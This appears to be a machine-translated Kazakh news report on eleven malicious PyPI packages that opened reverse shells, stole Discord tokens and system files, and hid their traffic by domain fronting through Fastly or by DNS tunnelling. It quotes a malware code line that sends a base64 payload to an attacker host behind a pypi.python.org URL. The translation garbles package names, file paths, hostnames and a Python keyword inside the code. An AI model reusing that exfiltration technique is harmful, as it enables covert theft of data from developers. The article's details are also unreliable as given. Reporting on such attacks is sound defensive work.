PYPI (Python пакет индексі) анықтамалығында зиянды код бар 11 пакет анықталды. Проблемалар анықталғанға дейін пакеттер шамамен 38 мың рет жүктелді. Анықталған зиянды бумалар шабуылдаушылардың серверлерімен байланыс арналарын жасыру үшін күрделі әдістерді қолдану үшін ерекшеленеді.
- маңызды пакет (6305 жүктеп алу), маңызды-пакет (12897) - жүйеге қабықша қолжетімділікті (кері қабық) қамтамасыз ету үшін pypi.python.org сайтына қосылу желеуімен сыртқы серверге қосылым орнатты және ақпаратты жасыру үшін trevorc2 бағдарламасын пайдаланды. байланыс арнасы.
- pptest (10001), ipboards (946) - жүйе туралы ақпаратты беру үшін DNS байланыс арнасы ретінде пайдаланылады (бірінші пакетте хост атауы, жұмыс каталогы, ішкі және сыртқы IP, екіншісінде - пайдаланушы аты мен хост атауы) .
- Owlmoon (3285), Discordsafety (557), YiffParty (1859) - жүйеде Discord қызметіне арналған таңбалауышты анықтап, оны сыртқы хостқа жіберді.
- TRRRFAB (287) - идентификатор, хост атауы және etc / etc / passwd, / etc / hods / хосттар, / үйді сыртқы хостқа жіберді.
- 10Цент10 (490) - сыртқы хостпен кері қабық байланыс орнатылды.
- yandex-yt (4183) - жүйенің бұзылғаны және nda.ya.ru (api.ya.cc) арқылы берілген әрі қарайғы әрекеттер туралы қосымша ақпараты бар бетке қайта бағытталуы туралы хабарламаны көрсетеді.
Белсенділігін жасыру үшін PyPI каталогында пайдаланылатын Fastly мазмұнды жеткізу желісін пайдаланатын маңызды бума мен маңызды бума бумаларында пайдаланылатын сыртқы хосттарға қол жеткізу әдісі ерекше назар аударады. Шын мәнінде, сұраулар pypi.python.org серверіне жіберілді (HTTPS сұрауының ішіндегі SNI-де python.org атауын көрсетуді қоса), бірақ HTTP «Хост» тақырыбы шабуылдаушылар басқаратын сервердің атауын қамтиды (сек. Алға.io. Global.Prod.pry.pry.net). Мазмұнды жеткізу желісі деректерді жіберу кезінде pypi.python.org сайтына TLS қосылымының параметрлерін пайдаланып шабуылдаушы серверге ұқсас сұрау жіберді.
PyPI инфрақұрылымы типтік сұрауларды кэштеу үшін Varnish мөлдір проксиін пайдаланатын, сонымен қатар HTTPS сұрауларын прокси арқылы қайта жіберу үшін соңғы серверлерде емес, CDN деңгейінде TLS сертификатын өңдеуді пайдаланатын Fastly мазмұнды жеткізу желісімен жұмыс істейді. Мақсатты хостқа қарамастан, сұраулар HTTP «Хост» тақырыбын пайдаланып қалаған хостты анықтайтын проксиге жіберіледі және хост домен атаулары барлық Fastly клиенттеріне тән CDN жүктеме теңестіруші IP мекенжайларына байланыстырылады.
Сондай-ақ, шабуылдаушылар сервері барлық адамдарға тегін жоспарларын қамтамасыз ететін және тіпті анонимді тіркеуге мүмкіндік беретін CDN-мен тіркеледі. Бір қызығы, «кері қабықты» құру кезінде жәбірленушіге сұрау жіберу үшін схема да қолданылады, бірақ шабуылдаушы хост тарапынан басталады. Сырттай қарағанда, шабуылдаушылардың серверімен өзара әрекеттесу PyPI TLS сертификаты арқылы шифрланған PyPI каталогымен заңды сеанс сияқты көрінеді. «Домендік фронтинг» деп аталатын ұқсас әдіс бұрын блоктауды айналып өту кезінде хост атын жасыру үшін белсенді түрде қолданылған, кейбір CDN желілерінде SNI-де жалған хостты көрсету және іс жүзінде хосттың атын жіберу арқылы HTTPS-ке кіру мүмкіндігін пайдалана отырып, белсенді түрде пайдаланылды. TLS сеансының ішіндегі HTTP хост тақырыбында сұралған хост.
Зиянды әрекетті жасыру үшін, Trevorc2 пакеті қосымша веб-шарлауға ұқсас сервермен өзара әрекеттесу үшін қолданылды, мысалы, «https://pypi.python.org/images» кескіні арқылы жіберілді. guid=” guid параметрінде ақпаратты кодтаумен. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, тақырыптар = {'Хост': "psec.forward.io.global.prod.fastly.net"})
Pptest және ipboards пакеттері DNS серверіне сұраулардағы пайдалы ақпаратты кодтауға негізделген желілік белсенділікті жасыру үшін басқа тәсілді пайдаланды. Зиянды бағдарламалық құрал ақпаратты «nu4timjagq4fimbuhe.example.com» сияқты DNS сұрауларын орындау арқылы жібереді, онда басқару серверіне жіберілген деректер ішкі домен атауында base64 пішімі арқылы кодталған. Шабуылшы бұл хабарламаларды Experty.com доменіне DNS серверін басқару арқылы қабылдайды.
Ақпарат көзі: opennet.ru